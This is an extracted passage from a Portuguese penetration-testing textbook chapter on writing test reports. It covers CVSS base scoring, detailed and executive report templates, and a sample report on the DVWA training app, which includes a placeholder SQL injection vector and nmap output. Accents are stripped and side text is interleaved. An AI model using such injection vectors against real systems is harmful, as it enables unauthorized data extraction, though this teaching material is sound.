1 BARKER, Elaine, BARKER, William, BURR, William, POLK, William e SMID, Miles.
Recommendation for Key Management Part I: General. NIST Special Publication SP800-57,
National Institute of Standards and Technology, 2007.
1 CARMICHAEL, Mary. Como Conter o Parasita Mais Letal do Mundo. Em Scientific American
Brasil, Ano 8, nmero 103, dezembro de 2010.
1 DWORKIN, Morris. Recommendation for Block Cipher Modes of Operation Methods and
Techniques. NIST Special Publication SP800-38A, National Institute of Standards and
Technology, 2001.
1 FRIEDMAN, William F. The index of coincidence and its applications in cryptology.

Department of Ciphers. Publ 22. Geneva, Illinois, EUA. Riverbank Laboratories, 1922.
1 GAINES, Helen Fouch. Cryptanalysis A study of ciphers and their solution. Dover
Publications, 1939.
1 Kleinjung, Thorsten, Aoki, Kazumaro, Franke, Jens, Lenstra, Arjen K., Thom, Emmanuel,
Bos, Joppe W., Gaudrym, Pierrick, Kruppa, Alexander, Montgomery, Peter L., Osvik, Dag
Arne, Riele, Herman te, Timofeev, Andrey e Zimmermann, Paul. Factorization of a 768-bit
RSA modulus. Cryptology ePrint Arhive 2010/006. IACR, 2010.
1 KNUDSEN, Lars. SMASH A Cryptographic Hash Function. Em Fast Software Encryption:

12th International Workshop, FSE 2005, volume 3557 de Lecture Notes in Computer
Science, pginas 228242. Springer, 2005.
1 KOST, Stephen. Security Analysis Hashing Credit Card Numbers: Unsafe Application Practice.
Relatrio Tcnico de Integrigy Corporation, 2007.
1 LENSTRA, Arjen, VERHEUL, Eric. Selecting Cryptographic Key Sizes. Journal of Cryptology,
volume 14, 1999.
1 MENEZES, Alfred, VAN OORSCHOT, Paul C. e VANSTONE, Scott A. Handbook of Applied

Cryptography. 5th edition. CRC Press, 2001.

1 OAKS, Scott. Java TM Security. 2nd edition. OReilly, 2001.
1 PRAMSTALLER, Norbert, RECHBERGER, Christian e RIJMEN, Vincent. Breaking a New

Hash Function Design Strategy Called SMASH. Em Selected Areas in Cryptography, 12th
International Workshop, SAC 2005, volume 3897 de Lecture Notes in Computer Science,
pginas 234244. Springer, 2005.
1 RIBEIRO, Ronaldo. Cdigo Postal | guas Claras, DF 71900-000 Fico Urbana. Em National
Geographic Brasil, janeiro de 2011.
1 SAVALICH, William. Evolution in the Revolution. Em Digital Photo Pro, maro/abril de 2009.
467
1 SINGH, Simon. The Code Book The Evolution of Secrecy from Mary, Queen of Scots to
Quantum Cryptography. Doubleday, 1999.
1 SMART, Nigel. ECRYPT II Yearly Report on Algorithm and Keysizes (2009-2010) Revision 1.0.
ECRYPT, maro de 2010.
1 STALLINGS, William. Cryptography and Network Security Principles and Practice. 4th
edition. Prentice Hall.
1 STEVENS, Marc, SOTIROV, Alexander, APPELBAUM, Jacob, LENSTRA, Arjen, MOLNAR,

David, OSVIK, Dag Arne e DE WEGER, Benne. Short Chosen-Prefix Collisions for MD5 and
the Creation of a Rogue CA Certificate. Em Advances in Cryptology CRYPTO 2009 29th
Annual International Cryptology Conference, volume 5677 de Lecture Notes in Computer
Science, pginas 5569, Springer, 2009.
1 SWENSON, Christopher. Modern Cryptanalysis Techniques for Advanced Code Breaking.

Wiley Publishing, Inc., 2008.
1 WAGNER, David e SCHNEIER, Bruce. Analysis of the SSL 3.0 Protocol. Em Proceedings of the
Second USENIX Workshop on Electronic Commerce, 1996.
1 WANG, Xiaoyun, YAO, Andrew e YAO, Frances. New Collision Search for SHA-1. Rump Session
de Crypto05, 2005.
1 WANG, Xiaoyun, YIN, Yiqun Lisa e YU, Hongbo. Finding Collisions in the Full SHA-1. Em
CRYPTO 2005: 25th Annual International Cryptology Conference, volume 3621 de Lecture
Notes in Computer Science. Springer, 2005.
1 WANG, Xiaoyun e YU, Hongbo. How to Break MD5 and Other Hash Functions. Em
EUROCRYPT 2005, 24th Annual International Conference on the Theory and Applications
of Cryptographic Techniques, volume 3494 de Lecture Notes in Computer Science, pages
1935. Springer, 2005.
1 WONG, Kate. Twilight of the Neandertals. Em Scientific American, volume 301, nmero 2,
agosto de 2009.
468
10
Escrita de relatrios
e exerccio completo
objetivos
Ilustrar como os resultados de um teste de invaso de aplicao web podem ser

apresentados para as equipes tcnicas e gerenciais, considerando-se a gravidade de
cada vulnerabilidade encontrada.
conceitos
Relatrio detalhado, relatrio executivo, common vulnerability scoring system.
Introduo
Uma vez finalizado um teste de invaso em aplicaes web, o resultado deve ser apre- q
sentado ao cliente do servio, seja ele interno ou externo. Essa etapa extremamente
importante, pois ela que nortear quais problemas sero tratados, considerando-se o
risco para o negcio, as limitaes de oramento, os prazos e a dificuldade de correo.
Obviamente, em um cenrio ideal, todas as vulnerabilidades devem ser corrigidas, mas,
na prtica, infelizmente, isso quase nunca acontece. Desse modo, subsdios suficientes
devem ser fornecidos ao cliente para que ele, com base em uma anlise de risco, seja
capaz de traar um plano de ao realstico, para correo dos defeitos mais crticos.
Esse processo, normalmente, resulta nos seguintes entregveis e atividades:
1 Relatrio detalhado: contm todas as informaes, gerais e tcnicas, acerca do

trabalho realizado, incluindo as vulnerabilidades encontradas, meios de explorao, Captulo 10 - Escrita de relatrios e exerccio completo
recomendaes para correo e o quo crtico cada problema para a segurana do
ambiente. Devido ao nvel de detalhes fornecido por tal documento, serve de base
para o processo de correo ou para a criao de controles compensatrios.
1 Relatrio executivo: baseado no contedo do relatrio detalhado, engloba apenas

os fatos mais relevantes do teste de invaso executado. O objetivo que seja lido por
membros do corpo gerencial, para que tenham uma viso geral das vulnerabilidades
do ambiente.
1 Apresentao tcnica: deve ser realizada para o grupo tcnico do cliente, visando
mostrar as vulnerabilidades encontradas e discutir mtodos que podem ser ado-
tados para corrigi-las de maneira apropriada. Normalmente, esse tipo de reunio
tem durao de duas a quatro horas, dependendo da quantidade de problemas
detectados pelo teste de invaso.
469
1 Apresentao executiva: voltada para o corpo gerencial, trata somente dos fatos mais q
importantes do trabalho, sem entrar em detalhes tcnicos. Em uma reunio dessa natu-
reza, que dura no mximo uma hora, comum discutir, por exemplo, aspectos como o
tempo e o investimento necessrios para correo das vulnerabilidades reportadas.
O objetivo deste captulo discutir a criao de relatrios de testes de invaso e fornecer

um exerccio completo de avaliao de segurana de uma aplicao web. Para esse fim, o
Common Vulnerability Scoring System (CVSS) e modelos de relatrio completo e executivo
sero apresentados.A parte prtica, depois de um exerccio de aquecimento, contemplar
um cenrio abrangente, cobrindo diversas vulnerabilidades diferentes.
Common Vulnerability Scoring System

O Common Vulnerability Scoring System (CVSS), mantido pelo Forum for Incident q
Response and Security Teams First, define mtodos para estimar a gravidade de First
vulnerabilidades de TI com base em trs escores diferentes, de modo que seja possvel Confederao
internacional de times
avali-las sob um critrio uniforme (Mell et al., 2007). Cada escore, que um nmero real
de resposta a incidentes
entre zero e dez, resume um grupo de mtricas relacionadas entre si: de segurana, que atua
1 Base: compreende todas as mtricas sobre aspectos intrnsecos da vulnerabilidade, de maneira reativa
e preventiva contra
os quais independem de tempo e do ambiente no qual ela ocorre. incidentes, por meio do
1 Temporal: engloba as caractersticas da vulnerabilidade que variam com o tempo, compartilhamento de
informaes, criao
mas no com o ambiente. de ferramentas e
1 Ambiental: considera as caractersticas de um ambiente especfico. metodologias, definio
de melhores prticas e
importante observar que, enquanto o grupo base apresenta as propriedades fundamen- estmulo criao de
novas equipes ao redor
tais da vulnerabilidade, os demais adicionam informaes referentes ao contexto parti-
do mundo.
cular, no qual o defeito encontrado, enriquecendo assim o resultado (Mell et al., 2007).
Em inmeras situaes, porm, somente o escore base utilizado e essa a abordagem

adotada pelo presente texto. De modo a justificar o valor numrico calculado para cada
grupo, o padro demanda que um vetor textual, contendo as escolhas de cada mtrica,
acompanhe o respectivo escore.
Base
O grupo base de mtricas considera as caractersticas fundamentais de uma vulnerabili- q
dade, listadas a seguir:
1 Vetor de acesso: considera o posicionamento necessrio de um atacante na rede,

para que a explorao seja bem sucedida.
1 Complexidade de acesso: mede a dificuldade de explorao da vulnerabilidade.

1 Autenticao: descreve se necessrio estar autenticado ou no, para conseguir
explorar a vulnerabilidade.
1 Impacto confidencialidade: quantifica o impacto que o abuso do defeito de segu-

rana causa confidencialidade das informaes.
1 Impacto integridade: quantifica o impacto que o abuso do defeito de segurana

causa integridade das informaes.
1 Impacto disponibilidade: quantifica o impacto que o abuso do defeito de segurana

causa disponibilidade das informaes.
470
Os critrios de classificao estabelecidos para cada uma das mtricas, a frmula para
clculo do escore final e a estrutura do vetor textual so apresentados, nas prximas subse-
es, de acordo com o artigo de Mell et al. (2007).
Vetor de acesso (AV)

Quanto maior o nmero de pessoas com acesso ao ambiente vulnervel, maior a criti- q
cidade do defeito de segurana, pois o potencial de atacantes cresce.
Por exemplo, caso um servidor web inseguro seja colocado na internet e outro idntico,
em uma rede local, sem conexo remota, o ltimo estar exposto somente aos usurios do
prprio ambiente, enquanto que o primeiro ter o mundo todo como eventual origem de
ataque. Ainda nessa linha de raciocnio, o fato de uma explorao poder ser realizada remo-
tamente estimula que mais pessoas tentem o ataque, pois as chances de permanecerem
annimas aumentam drasticamente. A Figura 10.1 ilustra os valores e os critrios dessa
mtrica.
Valor da
f(AV) Critrios
mtrica
A vulnerabilidade pode ser explorada somente com acesso

Local (L) 0,395
local ao ativo vulnervel.
Rede adjacente possvel explorar a vulnerabilidade apenas a partir da rede

0,646
(A) local na qual se encontra o ativo inseguro.
Figura 10.1
Avaliao da O defeito de segurana pode ser explorado remotamente.
mtrica Vetor Rede (N) 1,0 No caso de aplicaes web, normalmente, esse o cenrio
de Acesso. encontrado.
Complexidade de acesso (AC)

Avalia o nvel de dificuldade de execuo do ataque, com base nos privilgios que o q
usurio precisa ter no sistema alvo, na dependncia de tcnicas de engenharia social
e se a configurao vulnervel encontrada comumente em ambientes de produo,
entre outros fatores.
Os critrios e valores da mtrica AC esto apresentados na Figura 10.2.
Valor da
f(AC) Critrios
Captulo 10 - Escrita de relatrios e exerccio completo

mtrica
Existem condies especiais para que o ataque seja bem-

Alto (H) 0,35 sucedido, como nvel de acesso elevado ao ambiente e
necessidade de comprometimento de outros ativos, por exemplo.
Algumas condies no to restritivas existem para efetuar a

explorao da vulnerabilidade com sucesso. Exemplos incluem a
Mdio (M) 0,61
necessidade de levantamento de informaes sobre o ambiente
Figura 10.2 e agentes de ameaa limitados a um pequeno grupo de pessoas.
Avaliao
da mtrica No h condies especializadas para explorao da
Complexidade Baixo (L) 0,71 vulnerabilidade. Um exemplo consiste na existncia de
de Acesso ferramentas automatizadas para execuo de um ataque.
471
Autenticao (Au)
Considera quantas vezes um atacante necessita se autenticar no sistema alvo antes q
de executar um ataque explorando a vulnerabilidade. importante observar que a
segurana do mecanismo de autenticao no considerada por essa mtrica, que trata
apenas do fornecimento de credenciais.
Os valores possveis e critrios dessa mtrica esto ilustrados na Figura 10.3.
Valor da mtrica f(Au) Critrios
Para conseguir explorar a vulnerabilidade, o atacante

Mltiplas vezes (M) 0,45
necessita se autenticar duas ou mais vezes no ambiente.
O usurio malicioso precisa se autenticar uma vez no Figura 10.3

Uma vez (S) 0,56
ambiente antes de realizar o ataque.
Avaliao
da mtrica
No h necessidade de autenticao para a realizao de
Nenhuma vez (N) 0,704 Autenticao.
um ataque.
Impacto confidencialidade (C)

Considera o montante de informaes que pode ter o sigilo comprometido se a vulnera- q
bilidade explorada com sucesso.
A Figura 10.4 apresenta os valores e critrios dessa mtrica.
Valor da mtrica f(C) Critrios
Nenhuma informao sigilosa revelada, como resultado de

Nenhum (N) 0,0
uma explorao bem-sucedida da vulnerabilidade.
Parte das informaes sigilosas comprometida se um

Parcial (P) 0,275
ataque realizado com sucesso.
Figura 10.4
Avaliao da
Todas as informaes sigilosas so reveladas em
Completo (C) 0,660 mtrica Impacto
decorrncia de um ataque bem-sucedido.
confidencialidade.
Impacto integridade (I)

Essa mtrica considera o montante de informaes que tem a integridade comprome- q
tida caso um ataque consiga explorar a vulnerabilidade.
Os valores e critrios desse item esto ilustrados na Figura 10.5.
Valor da mtrica f(I) Critrios
Nenhuma informao tem a integridade comprometida,

Nenhum (N) 0,0 como resultado de uma explorao bem sucedida da
vulnerabilidade.
Parte das informaes tem a integridade comprometida se

Parcial (P) 0,275
um ataque realizado com sucesso. Figura 10.5
Avaliao da
Todas as informaes so adulteradas em decorrncia de mtrica Impacto
Completo (C) 0,660
um ataque bem-sucedido.
integridade.
Impacto disponibilidade (A)

Mede o impacto disponibilidade do sistema caso a vulnerabilidade seja explorada em q
um ataque bem-sucedido.
472
A Figura 10.6 apresenta os valores e critrios dessa mtrica.
Valor da
f(A) Critrios
mtrica
Nenhum (N) 0,0 No h impacto disponibilidade do sistema vulnervel.
Se a vulnerabilidade explorada com sucesso, h reduo do

Parcial (P) 0,275
Figura 10.6 desempenho do ativo ou interrupo de parte dos servios.
Avaliao da
mtrica Impacto O sistema fica totalmente indisponvel em decorrncia de um
Completo (C) 0,660
ataque bem-sucedido.
disponibilidade (A).
Clculo de escore de base e estrutura do vetor textual

Para calcular o escore de base da vulnerabilidade, as seguintes frmulas devem ser empre-
gadas:
Impacto=10,41(1-(1-f (C))(1-f (I))(1-f (A)))
f (Impacto)= {{(0; se Impacto=0

1,176; caso contrrio)
Explorabilidade=20f (AV )f (AC)f(Au)

Escore de Base=arredonda_1_casa_decimal((0,6Impacto+0,4Explorabilidade-1,5)f (Impacto))
O vetor textual, por sua vez, indica qual valor foi escolhido para cada mtrica, de acordo q
com os critrios estabelecidos, e representado como uma lista, cujos elementos so
separados uns dos outros pelo caractere / e definidos pelo nome abreviado da mtrica,
seguido de : e, por fim, do valor atribudo.
O formato geral est abaixo apresentado:
AV:<L|A|N>/AC:<H|M|L>/Au:<M|S|N>/C:<N|P|C>/I:<N|P|C>/A:<N|P|C>
Para exemplificar esses conceitos, considere-se uma vulnerabilidade de injeo de SQL e os

valores atribudos a cada uma das mtricas por Gordeychik et al. (2008):
1 Vetor de acesso: Rede (N), f(AV) = 1,0.

1 Complexidade de acesso: Baixo (L), f(AC) = 0,71.
1 Autenticao: Nenhuma vez (N), f(Au) = 0,704.

1 Impacto confidencialidade: Completo (C), f(C) = 0,660.
1 Impacto integridade: Completo (C), f(I) = 0,660.
1 Impacto disponibilidade: Completo (C), f(A) = 0,660.
Aplicando-se as frmulas aos valores acima, obtm-se:
1 Impacto=10,41(1-(1-0,66)(1-0,66)(1-0,66))=10,41(1-0,340,340,34)=10,41(1-0,039304)=
10,410,960696=10,00084536
1 f(Impacto)=1,176
1 Explorabilidade=2010,710,704=9,9968
1 Escore de Base=(0,610,00084536+0,49,9968-1,5)1,176= (6,000507216+3,99872-1,5)1,176 =
8,4992272161,176=9,995091206016
=10,0
473
O vetor textual resultante para este cenrio :
AV:N/AC:L/Au:N/C:C/I:C/A:C
Logo, o escore de base para injeo de SQL deve ser indicado da seguinte maneira:
10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
De modo a facilitar a incluso em relatrios, no apndice deste captulo, uma tabela, adap-
tada do trabalho de Gordeychik et al. (2008), enumera os escores de base para os principais
defeitos de segurana existentes em aplicaes web.
Perigo de vulnerabilidades
Como possvel comparar o perigo oferecido por vulnerabilidades diferentes?
Tipos de relatrios
Normalmente, ao final de um teste de invaso, so fornecidos dois relatrios, descre- q
vendo os resultados do trabalho realizado:
1 Relatrio detalhado: contm todas as informaes, gerais e tcnicas, acerca do

trabalho realizado, incluindo as vulnerabilidades encontradas, meios de explorao,
recomendaes para correo e a criticidade de cada problema. Devido ao nvel de
detalhes fornecido por tal documento, serve de base para o processo de correo ou
para a criao de controles compensatrios.
1 Relatrio executivo: baseado no contedo do relatrio detalhado, engloba apenas

os fatos mais relevantes do teste de invaso executado. O objetivo que seja lido por
membros do corpo gerencial, para que tenham uma viso geral das vulnerabilidades
do ambiente.
Nesta seo, para cada um dos tipos de relatrio, um modelo geral apresentado, enquanto
que, no apndice deste captulo, exemplos so fornecidos para que o leitor tenha um norte
de como documentar os resultados obtidos.
Relatrio detalhado
Um modelo de relatrio detalhado est ilustrado abaixo:
1. Resumo
Descreve o trabalho realizado, incluindo o escopo de teste, perodo de execuo e principais

resultados alcanados.
2. Informaes do cliente
Lista as informaes de contato do cliente, como nome, endereo comercial, telefone, e-mail
e logotipo da empresa.
3. Escopo do trabalho
Descreve as aplicaes testadas no trabalho.
474
3.1.Aplicao 1
Descrio
Fornece uma descrio de alto nvel da aplicao, indicando o propsito, tecnologias

empregadas e funcionalidades existentes.
URL da pgina inicial
Topologia de rede
...
3.m Aplicao m
Descrio
Topologia de rede
4. Descrio do teste
Apresenta todos os aspectos do teste de invaso realizado.
4.1.Tipo de teste
Indica se o teste foi caixa-branca, caixa-cinza ou caixa-preta.
4.2.Perodo de execuo
Datas de incio e de finalizao do trabalho.
4.3.Locais de execuo
Local fsico e local lgico, a partir dos quais os testes foram realizados.
4.4.Metodologia empregada
Descrio da metodologia de teste empregada.
4.5.Informaes disponibilizadas
Lista de informaes disponibilizadas pelo cliente, para execuo dos trabalhos, incluindo
diagramas de rede, contas de usurio, projeto do sistema, documentos de requisito,

modelo de dados, entre outros.
4.6.Configurao dos controles de permetro
Quaisquer excees que tenham sido configuradas nas regras de permetro devem estar
listadas nesta seo.
4.7.Testes excludos
Enumerao dos testes que no foram executados.
5. Resultados
Descrio das vulnerabilidades encontradas em cada aplicao do escopo, incluindo uma

explicao do problema, URL afetada, tcnica de explorao que pode ser empregada, reco-
mendaes e escore de base segundo o CVSS.
475
5.1.Aplicao 1
Anlise das vulnerabilidades encontradas na Aplicao 1.
5.1.1 Vulnerabilidade 1
Descrio do problema
URL da pgina afetada
Mtodo de explorao
Recomendaes
Escore de base (CVSS)
...
5.1.n1 Vulnerabilidade n1
Descrio do problema
Mtodo de explorao
Recomendaes
...
5.m Aplicao m
5.m.1 Vulnerabilidade 1
Descrio do problema
Mtodo de explorao
Recomendaes
...
5.m.nm Vulnerabilidade nm
Descrio do problema

Mtodo de explorao
Recomendaes
6. Referncias
Lista de referncias bibliogrficas.
476
7. Anexos
Sadas de ferramentas, informaes extradas por meio de ataques, documentos de ter-

ceiros detalhando correes etc.
Relatrio executivo
Um modelo de relatrio executivo est ilustrado a seguir:
1. Resumo
Descreve o trabalho realizado, incluindo o escopo de teste, perodo de execuo e principais

resultados alcanados.
Lista as informaes de contato do cliente, como nome, endereo comercial, telefone, e-mail
e logotipo da empresa.
Descreve as aplicaes testadas no trabalho.
3.1.Aplicao 1
Fornece uma descrio de alto nvel da aplicao, indicando o propsito e funcionali-

dades existentes.
...
3.m Aplicao m
...
4. Sntese dos resultados
Nesta seo, os resultados dos testes de invaso devem ser apresentados graficamente,
agrupando as vulnerabilidades pelo tipo e, tambm, pelo grau de criticidade.
5. Diagnstico geral
Esta seo deve descrever, resumidamente, o que possvel realizar contra a aplicao, com
base nas vulnerabilidades encontradas.
Exerccio de fixao 3 e Captulo 10 - Escrita de relatrios e exerccio completo

Resultado de teste de invaso
Como o resultado de um teste de invaso pode ser apresentado?
Apndice
Tabela de escore de base de acordo com o CVSS
A Figura 10.7, adaptada de Gordeychik et al. (2008), ilustra possveis escores de base para as
principais vulnerabilidades encontradas em aplicaes web, alm de relacionar os captulos
em que aquelas podem ser encontradas neste livro.
477
Vulnerabilidade Escore de Base Captulos
Abuso de funcionalidade 4 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 8
Aplicao mal configurada 5,1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 2
Ataque por fora bruta 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 3, 4
Autenticao insuficiente 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 3
Autorizao insuficiente 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 8
Cross site request forgery 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 4
Cross-site scripting 6,4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 5
Expirao de sesso insuficiente 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 4
Falsificao de contedo 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5
Fixao de sesso 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 4
HTTP Request Smuggling 6,4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 7
HTTP Request Splitting 6,4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 7
HTTP Response Smuggling 6,4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 7
HTTP Response Splitting 6,4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 7
Incluso remota de arquivo 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 7
Indexao insegura 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 8
Injeo de comandos de sistema 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

7
operacional
Injeo de comandos SMTP 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 7
Injeo de SQL 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 6
Injeo de SSI 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 7
Injeo de XML 7,5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7
Injeo de XPath 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 7
Injeo de XQuery 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 7
Injeo em filtros LDAP 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 7
Negao de servio 7,8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 8
Percurso de caminho 7,8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 8

Percurso de diretrio 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 8
Permisses inadequadas 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 8
Previsibilidade de credenciais 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 3
Previsibilidade de identificadores 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) Figura 10.7

4
de sesso Escores de base
para as principais
Previsibilidade de localizao de 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
8 vulnerabilidades de
recursos
aplicaes web.
478
Vulnerabilidade Escore de Base Captulos
Processo de validao insuficiente 4 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 8
Proteo de dados insuficiente 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 9
Reconhecimento 0 (AV:N/AC:L/Au:N/C:N/I:N/A:N) 2
Redirecionamento 2,6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 8
Servidor mal configurado 5,1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 2
Transporte de dados inseguro 4 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 9
Vazamento de informaes 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 2, 6
Exemplo de relatrio detalhado

1. Resumo
Este relatrio descreve os resultados do teste externo de invaso da aplicao DVWA, reali-
zado no perodo de 05/01/2011 a 14/01/2011. Diversas vulnerabilidades foram descobertas
ao longo do processo, sendo algumas delas extremamente crticas, por possibilitarem a
extrao completa da base de dados, que se encontra em claro, apesar de conter informa-
es sigilosas.
Nome do Fulano de Tal

responsvel:
e-mail: fulano.tal@esr.rnp.br Fone: (21) 2275-5578
Rua Lauro Mller, 455, 4 andar Botafogo

Endereo:
CEP: 22290-160 Rio de Janeiro, RJ

Faz parte do escopo do presente trabalho uma nica aplicao web, chamada de DVWA.
3.1.DVWA
Descrio
A aplicao DVWA, criada pela RandomStorm, tem por objetivo permitir que aquelas
pessoas interessadas em aprender sobre vulnerabilidades em aplicaes web possam
realizar testes, em um ambiente controlado, sem cometer infraes legais. Como um
sistema de cdigo aberto, pode-se analisar o cdigo vulnervel, para entender o motivo
de um dado problema ocorrer.
http://dvwa.esr.rnp.br/login.php
479
Topologia de rede
Rede interna
Internet
DMZ
DVWA
4. Descrio do teste
4.1.Tipo de teste
Foi executado teste do tipo caixa-cinza.
4.2.Perodo de execuo
Este trabalho foi realizado no perodo de 05/01/2011 a 14/01/2011, somente em dias teis
e em horrio comercial.
4.3.Locais de execuo
O teste de invaso foi efetuado, a partir da sede da empresa Pentest Inc., em Campinas
(SP), por meio da internet.
4.4.Metodologia empregada
A metodologia de teste empregada consiste em um processo cclico, envolvendo as

seguintes etapas:
2 Reconhecimento: compreende o levantamento de informaes que podem auxiliar

no teste de invaso.
2 Mapeamento: consiste em relacionar tudo o que foi levantado na fase de reconheci-

mento, resultando em um mapa da aplicao.
2 Identificao de vulnerabilidades: busca de vulnerabilidades, nas diversas pginas

acessveis da aplicao e, tambm, na infraestrutura subjacente.
2 Explorao de vulnerabilidades: explorao das vulnerabilidades encontradas, para

se obter maior nvel de acesso e reiniciar o ciclo.
4.5.Informaes disponibilizadas
A ESR disponibilizou as seguintes informaes para realizao dos testes:
2 Diagrama de rede.
2 Conta de acesso no privilegiada (esruser/esruser).
2 URL da pgina principal da aplicao.
4.6.Configurao dos controles de permetro
Nenhuma configurao especial foi realizada no firewall da ESR para a execuo do teste de
invaso da aplicao DVWA.
480
4.7.Testes excludos
No foram realizados os seguintes testes:
2 Negao de servio.
2 Identificao de vulnerabilidades nos elementos de rede.
2 Anlise do cdigo-fonte da aplicao.
5. Resultados
Esta seo apresenta as vulnerabilidades encontradas no teste de invaso da aplicao

DVWA, incluindo, para cada uma delas, descrio do problema, URL afetada, mtodo de
explorao, recomendaes para correo e escore de base (CVSS).
5.1.DVWA
5.1.1. Injeo de SQL
Descrio do problema
Injeo de SQL atualmente um dos ataques mais comuns contra aplicaes web e consiste
em inserir comandos SQL, em campos e parmetros da aplicao, com o objetivo que sejam
executados na camada de dados (Stuttard e Pinto, 2007; Howard et al., 2005). Em ataques
mais simples, operaes podem ser realizadas no banco de dados, limitadas aos privilgios
da conta que realiza o acesso. Com um pouco mais de elaborao, possvel aproveitar-se
dos mecanismos de interao com o sistema operacional, existentes em bancos de dados,
para leitura/escrita de arquivos e execuo de comandos arbitrrios, por exemplo.
http://dvwa.esr.rnp.br/vulnerabilities/sqli/
Mtodo de explorao
Para extrao de dados arbitrrios, possvel fornecer o seguinte vetor ao campo User Id:
union <SELECT com duas colunas>#
Recomendaes
Para evitar ataques baseados em injeo de SQL, as seguintes medidas devem ser adotadas:
process-la, verifique se ela est de acordo com valores reconhecidamente vlidos Captulo 10 - Escrita de relatrios e exerccio completo
para o campo ou parmetro.
2 No submeta consultas ao banco de dados que sejam resultantes da concatenao do

comando a ser executado com valores fornecidos por usurios.
2 Utilize apenas comandos preparados (prepared statements), os quais so pr-compi-

lados e no permitem que a semntica seja alterada depois disso.
2 Realize o acesso camada de dados por meio de procedimentos definidos no banco

de dados, encapsulando, assim, a estrutura das tabelas que compem a aplicao.
2 Capture todos os erros de execuo e fornea apenas mensagens tratadas aos usu-
rios, isto , no exiba erros contendo comandos SQL, pilhas de execuo e cdigos
especficos de plataforma.
2 Utilize na aplicao uma conta para acesso ao banco de dados com os mnimos privil-
gios necessrios execuo das tarefas.
481
10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
5.1.2. Cross-site scripting refletido
Descrio do problema
Cross-site scripting, tambm conhecido como XSS, atualmente um dos defeitos de

segurana mais comumente encontrados em aplicaes web, permitindo utilizar uma
aplicao vulnervel, para transportar cdigo malicioso, normalmente escrito em
JavaScript, at o navegador de outro usurio. Uma vez que a poltica de mesma origem
respeitada, o navegador da vtima entende que o cdigo recebido legtimo e, por isso,
informaes sensveis, como o identificador de sesso do usurio, por exemplo, podem
ser acessadas programaticamente. Nesse caso, um usurio malicioso capaz de seques-
trar a sesso da pessoa atacada, bastando para isso enviar, em todas as requisies
fraudulentas, o identificador obtido.
http://dvwa.esr.rnp.br/vulnerabilities/xss_r/
Mtodo de explorao
Para uma prova de conceito, digite o seguinte vetor no campo presente na pgina afetada:
Recomendaes
process-la, verifique se ela est de acordo com valores reconhecidamente vlidos
para o campo ou parmetro.
2 Utilize codificao HTML na sada, o que faz com que caracteres potencialmente peri-
gosos sejam tratados como parte do contedo da pgina HTML, em vez de conside-
rados parte da estrutura. Por exemplo, o texto <script> seria inserido na pgina como
<script>, uma vez codificado.
2 Quando filtros de entrada e sada forem utilizados, aplique-os, recursivamente, at

que todos os elementos maliciosos sejam removidos.
2 Nos casos em que identificadores de sesso so transportados por meio de cookies,

defina o atributo HttpOnly, para evitar que sejam acessveis por cdigo executando no
lado cliente da aplicao. Embora isso no resolva o problema de cross-site scripting,
pelo menos evita que a sesso da vtima seja facilmente sequestrada.
2 Desabilite o mtodo TRACE no servidor web, para evitar cross-site tracing.

6,4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
...
6. Referncias
482
7. Anexos
7.1.Sada do nmap
Starting Nmap 5.00 ( http://nmap.org ) at 2011-09-18 11:16 BRT
Interesting ports on exemplo.esr.rnp.br (192.168.213.200):
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.5 (protocol 2.0)
| ssh-hostkey: 1024 c0:df:2d:0b:bd:91:c0:05:80:e5:ec:ef:bf:46:cd:f4

(DSA)
|_ 2048 f0:c9:22:fe:61:ab:61:f1:7a:08:2a:00:f5:df:3a:96 (RSA)
80/tcp open http Apache httpd 2.2.17 ((Fedora))
| robots.txt: has 1 disallowed entry
|_ /
| html-title: Damn Vulnerable Web App (DVWA) - Login
|_ Requested resource was http://dvwa.esr.rnp.br/login.php
81/tcp open http lighttpd 1.4.26
|_ html-title: Powered by lighttpd
443/tcp open ssl/http Apache httpd 2.2.17 ((Fedora))
|_ sslv2: server still supports SSLv2
|_ html-title: Escola Superior de Redes
3000/tcp open ppp?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_ html-title: Apache Tomcat
8090/tcp open http nginx web server 0.8.53
|_ html-title: Test Page for the Nginx HTTP Server on Fedora Captulo 10 - Escrita de relatrios e exerccio completo
7.2.Sada do Nikto
